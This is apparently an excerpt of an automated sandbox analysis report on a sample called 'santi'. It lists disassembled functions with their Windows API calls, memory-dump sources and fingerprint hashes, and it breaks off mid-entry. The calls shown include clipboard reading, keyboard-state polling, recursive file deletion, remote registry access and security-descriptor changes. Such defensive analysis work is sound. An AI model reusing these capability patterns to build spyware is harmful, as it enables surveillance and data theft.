                                                                Function 00336B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32(0037DC00), ref: 00336B36
                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00336B44
                                                                • GetClipboardData.USER32(0000000D), ref: 00336B4C
                                                                • CloseClipboard.USER32 ref: 00336B58
                                                                • GlobalLock.KERNEL32(00000000), ref: 00336B74
                                                                • CloseClipboard.USER32 ref: 00336B7E
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00336B93
                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00336BA0
                                                                • GetClipboardData.USER32(00000001), ref: 00336BA8
                                                                • GlobalLock.KERNEL32(00000000), ref: 00336BB5
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00336BE9
                                                                • CloseClipboard.USER32 ref: 00336CF6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                • String ID:
                                                                • API String ID: 3222323430-0
                                                                • Opcode ID: b456be51ca68cdaffcee44adcd677f11fb7cd0d9144e0fcc8abe98b638c32468
                                                                • Instruction ID: a104fb59f6998e945f7fa4308c30200424cae82005a9c8262bdcd3aa3e8dca67
                                                                • Opcode Fuzzy Hash: b456be51ca68cdaffcee44adcd677f11fb7cd0d9144e0fcc8abe98b638c32468
                                                                • Instruction Fuzzy Hash: CE519071240201AFD312AF66DD9AF6E77BCAF48B01F418529F646D61E1DFB0D8058B62
                                                                Function 0032F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0032F62B
                                                                • FindClose.KERNEL32(00000000), ref: 0032F67F
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032F6A4
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032F6BB
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032F6E2
                                                                • __swprintf.LIBCMT ref: 0032F72E
                                                                • __swprintf.LIBCMT ref: 0032F767
                                                                • __swprintf.LIBCMT ref: 0032F7BB
                                                                  • Part of subcall function 0030172B: __woutput_l.LIBCMT ref: 00301784
                                                                • __swprintf.LIBCMT ref: 0032F809
                                                                • __swprintf.LIBCMT ref: 0032F858
                                                                • __swprintf.LIBCMT ref: 0032F8A7
                                                                • __swprintf.LIBCMT ref: 0032F8F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                • API String ID: 835046349-2428617273
                                                                • Opcode ID: feed9877c3ef9585c84266ea31cc87da1f2789379af95b72ece23917c939a9d3
                                                                • Instruction ID: d17ffb463b526f0419870b12669306fc49cf6d1c709bc7ffaa1455b3262500d1
                                                                • Opcode Fuzzy Hash: feed9877c3ef9585c84266ea31cc87da1f2789379af95b72ece23917c939a9d3
                                                                • Instruction Fuzzy Hash: 0BA14FB2418344ABC311EB95C885DAFB7ECEF98704F840C2EF58587191EB34D959CB62
                                                                Function 00331B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00331B50
                                                                • _wcscmp.LIBCMT ref: 00331B65
                                                                • _wcscmp.LIBCMT ref: 00331B7C
                                                                • GetFileAttributesW.KERNEL32(?), ref: 00331B8E
                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00331BA8
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00331BC0
                                                                • FindClose.KERNEL32(00000000), ref: 00331BCB
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00331BE7
                                                                • _wcscmp.LIBCMT ref: 00331C0E
                                                                • _wcscmp.LIBCMT ref: 00331C25
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00331C37
                                                                • SetCurrentDirectoryW.KERNEL32(003939FC), ref: 00331C55
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00331C5F
                                                                • FindClose.KERNEL32(00000000), ref: 00331C6C
                                                                • FindClose.KERNEL32(00000000), ref: 00331C7C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                • String ID: *.*
                                                                • API String ID: 1803514871-438819550
                                                                • Opcode ID: f35304e462152ab7358976354d0034971194f14dfe80c8ebc2b5a82e3b76ee05
                                                                • Instruction ID: 5ec8bd6f3bc128bbdbbc1679233211c1fa6d6ae6df85c8f00c86eda0298c6b74
                                                                • Opcode Fuzzy Hash: f35304e462152ab7358976354d0034971194f14dfe80c8ebc2b5a82e3b76ee05
                                                                • Instruction Fuzzy Hash: 1D31D572A012196FDF26AFB0DC89BDE77ACAF0A320F104155F815E7090EBB0DE458A64
                                                                Function 00331C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00331CAB
                                                                • _wcscmp.LIBCMT ref: 00331CC0
                                                                • _wcscmp.LIBCMT ref: 00331CD7
                                                                  • Part of subcall function 00326BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00326BEF
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00331D06
                                                                • FindClose.KERNEL32(00000000), ref: 00331D11
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00331D2D
                                                                • _wcscmp.LIBCMT ref: 00331D54
                                                                • _wcscmp.LIBCMT ref: 00331D6B
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00331D7D
                                                                • SetCurrentDirectoryW.KERNEL32(003939FC), ref: 00331D9B
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00331DA5
                                                                • FindClose.KERNEL32(00000000), ref: 00331DB2
                                                                • FindClose.KERNEL32(00000000), ref: 00331DC2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                • String ID: *.*
                                                                • API String ID: 1824444939-438819550
                                                                • Opcode ID: efd133b49ad5349226ce1997a86dd10992fd103e6b5d84a90852a35f7f44e1be
                                                                • Instruction ID: 2f9047804832be3570e079bb1ceaaab90853528776cb81ba4781bb437de4e056
                                                                • Opcode Fuzzy Hash: efd133b49ad5349226ce1997a86dd10992fd103e6b5d84a90852a35f7f44e1be
                                                                • Instruction Fuzzy Hash: 2C31FB31A016196BCF27AFA0DC89BEE77ACAF46320F114551E801A70D1DBB0DE45CF54
                                                                Function 002E7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset
                                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                • API String ID: 2102423945-2023335898
                                                                • Opcode ID: b53841a3bd5872b0e5055f6121c6aabbe71529656f777f593b3711dc80576182
                                                                • Instruction ID: a71c0732714e26a2695b0d8ca2dda7b696e7771e2d795aefbe8a485a2398b04d
                                                                • Opcode Fuzzy Hash: b53841a3bd5872b0e5055f6121c6aabbe71529656f777f593b3711dc80576182
                                                                • Instruction Fuzzy Hash: 8182F171D2425ACFCF25CF99C880AADB7B1FF48310F6981A9D859AB351E7709D94CB80
                                                                Function 0033091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 003309DF
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003309EF
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003309FB
                                                                • __wsplitpath.LIBCMT ref: 00330A59
                                                                • _wcscat.LIBCMT ref: 00330A71
                                                                • _wcscat.LIBCMT ref: 00330A83
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00330A98
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330AAC
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330ADE
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330AFF
                                                                • _wcscpy.LIBCMT ref: 00330B0B
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00330B4A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                • String ID: *.*
                                                                • API String ID: 3566783562-438819550
                                                                • Opcode ID: 3035155b3eb563fc54165fa83293c3e1b8b74e241fd142e097146bba56e59829
                                                                • Instruction ID: 37cd7e09eb00734a2827673d0aaad3a2db9c91008c370bf3745f8e0c1b98f5f0
                                                                • Opcode Fuzzy Hash: 3035155b3eb563fc54165fa83293c3e1b8b74e241fd142e097146bba56e59829
                                                                • Instruction Fuzzy Hash: 746167725043059FD715EF60C894AAEB3E8FF89310F05892EF989C7252DB31EA45CB92
                                                                Function 002E6F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60$888 8
                                                                • API String ID: 0-2058216945
                                                                • Opcode ID: 5a056e08940a2658ac3fc0f07fa95bfc17559e769fbeee6518790b193e3aacf1
                                                                • Instruction ID: e6e6702b1fdb722dbccdb07a99ada24d95c36d5acc055486ddb3068bd53da0af
                                                                • Opcode Fuzzy Hash: 5a056e08940a2658ac3fc0f07fa95bfc17559e769fbeee6518790b193e3aacf1
                                                                • Instruction Fuzzy Hash: CF729071E1425A9BDF25CF59C8807AEB7B5FF08310F5581AAE809EB284DB709E41CF90
                                                                Function 0031A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
                                                                  • Part of subcall function 0031ABBB: GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
                                                                  • Part of subcall function 0031ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0031A69F,?,?,?), ref: 0031ABF0
                                                                  • Part of subcall function 0031ABBB: HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
                                                                  • Part of subcall function 0031AC56: GetProcessHeap.KERNEL32(00000008,0031A6B5,00000000,00000000,?,0031A6B5,?), ref: 0031AC62
                                                                  • Part of subcall function 0031AC56: HeapAlloc.KERNEL32(00000000,?,0031A6B5,?), ref: 0031AC69
                                                                  • Part of subcall function 0031AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0031A6B5,?), ref: 0031AC7A
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0031A6D0
                                                                • _memset.LIBCMT ref: 0031A6E5
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0031A704
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A715
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0031A752
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0031A76E
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A78B
                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0031A79A
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0031A7A1
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0031A7C2
                                                                • CopySid.ADVAPI32(00000000), ref: 0031A7C9
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0031A7FA
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0031A820
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0031A834
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                • String ID:
                                                                • API String ID: 3996160137-0
                                                                • Opcode ID: 2b3644ef5ba4ce34694aba3cb91bdbbb53ae6ac247b53d9bb4b7c4e407f4ef13
                                                                • Instruction ID: ee63919714d9394fc3936ed6ba8c643f210defbbafa0d49f525dcf2395573241
                                                                • Opcode Fuzzy Hash: 2b3644ef5ba4ce34694aba3cb91bdbbb53ae6ac247b53d9bb4b7c4e407f4ef13
                                                                • Instruction Fuzzy Hash: A8517E71A01209AFDF06DF91DC44EEEBBB9FF08311F048129F811AB291D7749A46CB61
                                                                Function 003263F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00326EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00325FA6,?), ref: 00326ED8
                                                                  • Part of subcall function 003272CB: GetFileAttributesW.KERNEL32(?,00326019), ref: 003272CC
                                                                • _wcscat.LIBCMT ref: 00326441
                                                                • __wsplitpath.LIBCMT ref: 0032645F
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00326474
                                                                • _wcscpy.LIBCMT ref: 003264A3
                                                                • _wcscat.LIBCMT ref: 003264B8
                                                                • _wcscat.LIBCMT ref: 003264CA
                                                                • DeleteFileW.KERNEL32(?), ref: 003264DA
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003264EB
                                                                • FindClose.KERNEL32(00000000), ref: 00326506
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                • String ID: \*.*
                                                                • API String ID: 2643075503-1173974218
                                                                • Opcode ID: 56e6d5d34f28747dfa0db244b3672500e4711797bb69883fe60e3bf618a80e30
                                                                • Instruction ID: 39032e08c06beb683326595cfb914f8f355c1af552e521bebad3618aed8a698a
                                                                • Opcode Fuzzy Hash: 56e6d5d34f28747dfa0db244b3672500e4711797bb69883fe60e3bf618a80e30
                                                                • Instruction Fuzzy Hash: E631C5B24093849AC722EBA49C85EDF77DCAF56300F00491EF5D8C7141EA35D50D87A7
                                                                Function 003431BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0034328E
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0034332D
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003433C5
                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00343604
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00343611
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1240663315-0
                                                                • Opcode ID: b361b79e218a8005dd81635844d3441d667cc8e2fc7b3dac09eab3e06e93178f
                                                                • Instruction ID: 319be71b598c7dbd0b009b79b32d5cd9696d0c30cf27f75ac3d8a039f48ba2e5
                                                                • Opcode Fuzzy Hash: b361b79e218a8005dd81635844d3441d667cc8e2fc7b3dac09eab3e06e93178f
                                                                • Instruction Fuzzy Hash: E6E15A31604210AFCB15DF29C995E6ABBE8EF89714F0488ADF54ADB2A1DB30ED05CF51
                                                                Function 00322B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00322B5F
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00322BE0
                                                                • GetKeyState.USER32(000000A0), ref: 00322BFB
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00322C15
                                                                • GetKeyState.USER32(000000A1), ref: 00322C2A
                                                                • GetAsyncKeyState.USER32(00000011), ref: 00322C42
                                                                • GetKeyState.USER32(00000011), ref: 00322C54
                                                                • GetAsyncKeyState.USER32(00000012), ref: 00322C6C
                                                                • GetKeyState.USER32(00000012), ref: 00322C7E
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00322C96
                                                                • GetKeyState.USER32(0000005B), ref: 00322CA8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: 65a751cd854e029770b68e2f18897185dcdbdde59bc5f997dbc81cdab4828805
                                                                • Instruction ID: 200058312b6b87be30175b5145ac0c8bcd0d0598b70ff432dbaed22379c58d13
                                                                • Opcode Fuzzy Hash: 65a751cd854e029770b68e2f18897185dcdbdde59bc5f997dbc81cdab4828805
                                                                • Instruction Fuzzy Hash: 9241D630A047E97DFF339B60AC043BBBEA06B12314F058059DAC6566C1DBA499C4C7A2
                                                                Function 00336D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                • String ID:
                                                                • API String ID: 1737998785-0
                                                                • Opcode ID: 6dbb61185b026326ec62de6b6972efa0adbff02f2f51511148954d7d633f2e9f
                                                                • Instruction ID: 5b2c7648587a94d3fb9a884219f995d9498260b13900e081cd80e1af289612c0
                                                                • Opcode Fuzzy Hash: 6dbb61185b026326ec62de6b6972efa0adbff02f2f51511148954d7d633f2e9f
                                                                • Instruction Fuzzy Hash: 2021AE31700110AFDB12AF65DC9AB2DB7ACEF45710F05C41AF90ADB2A1CBB0ED008B90
                                                                Function 0033C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00319ABF: CLSIDFromProgID.OLE32 ref: 00319ADC
                                                                  • Part of subcall function 00319ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00319AF7
                                                                  • Part of subcall function 00319ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00319B05
                                                                  • Part of subcall function 00319ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00319B15
                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0033C235
                                                                • _memset.LIBCMT ref: 0033C242
                                                                • _memset.LIBCMT ref: 0033C360
                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0033C38C
                                                                • CoTaskMemFree.OLE32(?), ref: 0033C397
                                                                Strings
                                                                • NULL Pointer assignment, xrefs: 0033C3E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
